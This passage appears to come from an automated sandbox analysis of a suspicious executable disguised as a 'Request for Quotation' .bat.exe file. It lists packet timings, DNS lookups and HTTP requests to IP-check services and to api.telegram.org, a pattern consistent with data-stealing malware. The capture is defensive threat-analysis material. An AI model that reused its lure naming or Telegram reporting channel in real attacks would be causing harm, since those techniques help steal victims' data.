Nov 20, 2024 09:33:11.380158901 CET	49723	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.380402088 CET	49723	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.380428076 CET	443	49723	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.428992033 CET	49721	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:11.616167068 CET	443	49722	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.618515968 CET	49722	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.618556023 CET	443	49722	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.760162115 CET	443	49722	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.760327101 CET	443	49722	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.760654926 CET	49722	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.760958910 CET	49722	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.764605999 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:11.765531063 CET	49724	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:11.770905972 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:11.770983934 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:11.771783113 CET	80	49724	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:11.771877050 CET	49724	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:11.772047997 CET	49724	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:11.778284073 CET	80	49724	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:11.860171080 CET	443	49723	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.862025023 CET	49723	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.862060070 CET	443	49723	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.012434006 CET	443	49723	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.012598991 CET	443	49723	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.012665033 CET	49723	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.012926102 CET	49723	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.017555952 CET	49721	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.018260002 CET	49725	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.023302078 CET	80	49721	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:12.023365021 CET	49721	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.023901939 CET	80	49725	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:12.024071932 CET	49725	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.024102926 CET	49725	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.029822111 CET	80	49725	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:12.335205078 CET	80	49724	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:12.336596012 CET	49726	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.336700916 CET	443	49726	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.336788893 CET	49726	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.337038040 CET	49726	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.337088108 CET	443	49726	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.382035971 CET	49724	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.600101948 CET	80	49725	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:12.642879009 CET	49727	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.642937899 CET	443	49727	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.643171072 CET	49727	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.645292997 CET	49727	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.645311117 CET	443	49727	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.647649050 CET	49725	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.798669100 CET	443	49726	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.830806971 CET	49726	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.830871105 CET	443	49726	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.944490910 CET	443	49726	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.944578886 CET	443	49726	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:12.944636106 CET	49726	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.945468903 CET	49726	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:12.951634884 CET	49728	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.956825972 CET	80	49728	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:12.956947088 CET	49728	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.957039118 CET	49728	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:12.962155104 CET	80	49728	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:13.141437054 CET	443	49727	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:13.143080950 CET	49727	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.143096924 CET	443	49727	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:13.280395985 CET	443	49727	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:13.280466080 CET	443	49727	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:13.280581951 CET	49727	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.281014919 CET	49727	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.284708023 CET	49725	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:13.285775900 CET	49729	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:13.290664911 CET	80	49725	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:13.290781975 CET	49725	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:13.290972948 CET	80	49729	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:13.291044950 CET	49729	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:13.291140079 CET	49729	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:13.296145916 CET	80	49729	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:13.549091101 CET	80	49728	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:13.550421953 CET	49730	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.550457001 CET	443	49730	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:13.550520897 CET	49730	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.550900936 CET	49730	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.550915003 CET	443	49730	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:13.600764990 CET	49728	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:13.953402042 CET	80	49729	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:13.954750061 CET	49731	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.954818010 CET	443	49731	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:13.954888105 CET	49731	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.955137968 CET	49731	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:13.955167055 CET	443	49731	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.001102924 CET	49729	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.022783995 CET	443	49730	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.025031090 CET	49730	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.025055885 CET	443	49730	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.166141033 CET	443	49730	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.166305065 CET	443	49730	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.166383028 CET	49730	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.167002916 CET	49730	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.171427965 CET	49728	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.172769070 CET	49732	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.178489923 CET	80	49728	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:14.178548098 CET	49728	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.178940058 CET	80	49732	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:14.179002047 CET	49732	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.179128885 CET	49732	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.184191942 CET	80	49732	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:14.438608885 CET	443	49731	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.440210104 CET	49731	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.440296888 CET	443	49731	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.573071003 CET	443	49731	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.573232889 CET	443	49731	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.573410988 CET	49731	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.573690891 CET	49731	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.577251911 CET	49729	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.578392982 CET	49733	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.582863092 CET	80	49729	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:14.582923889 CET	49729	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.585856915 CET	80	49733	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:14.585931063 CET	49733	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.586076975 CET	49733	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:14.591049910 CET	80	49733	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:14.743051052 CET	80	49732	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:14.754311085 CET	49734	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.754386902 CET	443	49734	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.754700899 CET	49734	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.754945993 CET	49734	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:14.754980087 CET	443	49734	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:14.788280964 CET	49732	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.163778067 CET	80	49733	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:15.165056944 CET	49735	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.165086031 CET	443	49735	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.165180922 CET	49735	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.165585041 CET	49735	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.165601015 CET	443	49735	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.210133076 CET	49733	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.230761051 CET	443	49734	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.232309103 CET	49734	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.232397079 CET	443	49734	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.367661953 CET	443	49734	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.367731094 CET	443	49734	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.367908955 CET	49734	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.369338989 CET	49734	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.375242949 CET	49736	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.375437975 CET	49732	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.380822897 CET	80	49736	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:15.380914927 CET	49736	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.381143093 CET	49736	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.381263018 CET	80	49732	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:15.381308079 CET	49732	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.385932922 CET	80	49736	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:15.645917892 CET	443	49735	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.647557020 CET	49735	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.647598982 CET	443	49735	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.821166992 CET	443	49735	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.821314096 CET	443	49735	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.821382999 CET	49735	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.821751118 CET	49735	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.836456060 CET	49733	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.841675043 CET	80	49733	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:15.841737032 CET	49733	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:15.844667912 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:15.844713926 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:15.844902039 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:15.845293045 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:15.845321894 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:15.979320049 CET	80	49736	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:15.980911970 CET	49738	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.980953932 CET	443	49738	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:15.981057882 CET	49738	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.981372118 CET	49738	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:15.981389999 CET	443	49738	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:16.022677898 CET	49736	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:16.461740971 CET	443	49738	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:16.463476896 CET	49738	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:16.463495970 CET	443	49738	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:16.463676929 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:16.463761091 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:16.466258049 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:16.466295004 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:16.466593027 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:16.473602057 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:16.519320965 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:16.618411064 CET	443	49738	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:16.618571997 CET	443	49738	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:16.618635893 CET	49738	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:16.619050980 CET	49738	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:16.622715950 CET	49736	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:16.623971939 CET	49739	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:16.628694057 CET	80	49736	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:16.628767967 CET	49736	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:16.630572081 CET	80	49739	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:16.630639076 CET	49739	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:16.630717993 CET	49739	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:16.636272907 CET	80	49739	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:16.707295895 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:16.707648039 CET	443	49737	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:16.707731962 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:16.711829901 CET	49737	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:17.197326899 CET	80	49739	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:17.199676037 CET	49740	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:17.199774981 CET	443	49740	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:17.199858904 CET	49740	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:17.200129986 CET	49740	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:17.200145960 CET	443	49740	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:17.241405964 CET	49739	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:17.659507036 CET	443	49740	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:17.661083937 CET	49740	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:17.661096096 CET	443	49740	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:17.792982101 CET	443	49740	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:17.793054104 CET	443	49740	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:17.793104887 CET	49740	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:17.793524027 CET	49740	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:17.796672106 CET	49739	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:17.797800064 CET	49743	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:17.804244995 CET	80	49739	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:17.804337025 CET	49739	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:17.805160999 CET	80	49743	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:17.805243969 CET	49743	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:17.805315018 CET	49743	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:17.811903000 CET	80	49743	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:18.400226116 CET	80	49743	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:18.418900967 CET	49745	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:18.418948889 CET	443	49745	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:18.419004917 CET	49745	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:18.420069933 CET	49745	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:18.420087099 CET	443	49745	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:18.444535971 CET	49743	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:18.990963936 CET	443	49745	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:18.993304014 CET	49745	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:18.993325949 CET	443	49745	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:19.152592897 CET	443	49745	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:19.152657032 CET	443	49745	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:19.152945042 CET	49745	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:19.153350115 CET	49745	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:19.155973911 CET	49743	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:19.157165051 CET	49753	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:19.164073944 CET	80	49743	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:19.164141893 CET	49743	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:19.165177107 CET	80	49753	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:19.165353060 CET	49753	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:19.165551901 CET	49753	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:19.173289061 CET	80	49753	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:19.734417915 CET	80	49753	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:19.735908031 CET	49760	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:19.735987902 CET	443	49760	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:19.736059904 CET	49760	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:19.736658096 CET	49760	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:19.736689091 CET	443	49760	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:19.788348913 CET	49753	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:20.205120087 CET	443	49760	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:20.257072926 CET	49760	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:20.341272116 CET	49760	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:20.341294050 CET	443	49760	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:20.453027010 CET	443	49760	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:20.453102112 CET	443	49760	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:20.453181028 CET	49760	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:20.453552961 CET	49760	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:20.464346886 CET	49753	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:20.465114117 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:20.465172052 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:20.465260029 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:20.465756893 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:20.465774059 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:20.474101067 CET	80	49753	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:20.474157095 CET	49753	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:21.077470064 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:21.077668905 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:21.080571890 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:21.080581903 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:21.080883026 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:21.132040024 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:21.181215048 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:21.223360062 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:21.502325058 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:21.502408028 CET	443	49767	149.154.167.220	192.168.2.5
Nov 20, 2024 09:33:21.502507925 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:21.505280972 CET	49767	443	192.168.2.5	149.154.167.220
Nov 20, 2024 09:33:21.949748039 CET	49712	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:26.677536964 CET	49724	80	192.168.2.5	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 09:33:04.610477924 CET	60783	53	192.168.2.5	1.1.1.1
Nov 20, 2024 09:33:04.619577885 CET	53	60783	1.1.1.1	192.168.2.5
Nov 20, 2024 09:33:05.405869961 CET	57722	53	192.168.2.5	1.1.1.1
Nov 20, 2024 09:33:05.416461945 CET	53	57722	1.1.1.1	192.168.2.5
Nov 20, 2024 09:33:15.837233067 CET	59289	53	192.168.2.5	1.1.1.1
Nov 20, 2024 09:33:15.843918085 CET	53	59289	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 09:33:04.610477924 CET	192.168.2.5	1.1.1.1	0xd01b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:05.405869961 CET	192.168.2.5	1.1.1.1	0xa00	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:15.837233067 CET	192.168.2.5	1.1.1.1	0xcdb8	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 09:33:04.619577885 CET	1.1.1.1	192.168.2.5	0xd01b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 09:33:04.619577885 CET	1.1.1.1	192.168.2.5	0xd01b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:04.619577885 CET	1.1.1.1	192.168.2.5	0xd01b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:04.619577885 CET	1.1.1.1	192.168.2.5	0xd01b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:04.619577885 CET	1.1.1.1	192.168.2.5	0xd01b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:04.619577885 CET	1.1.1.1	192.168.2.5	0xd01b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:05.416461945 CET	1.1.1.1	192.168.2.5	0xa00	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:05.416461945 CET	1.1.1.1	192.168.2.5	0xa00	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 09:33:15.843918085 CET	1.1.1.1	192.168.2.5	0xcdb8	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:04.635445118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:05.200486898 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 29f99dac374806dd4c896d15469c2a66 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 09:33:05.207741976 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 09:33:05.363385916 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e700707834115db3f7d36b9a97b3ece0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
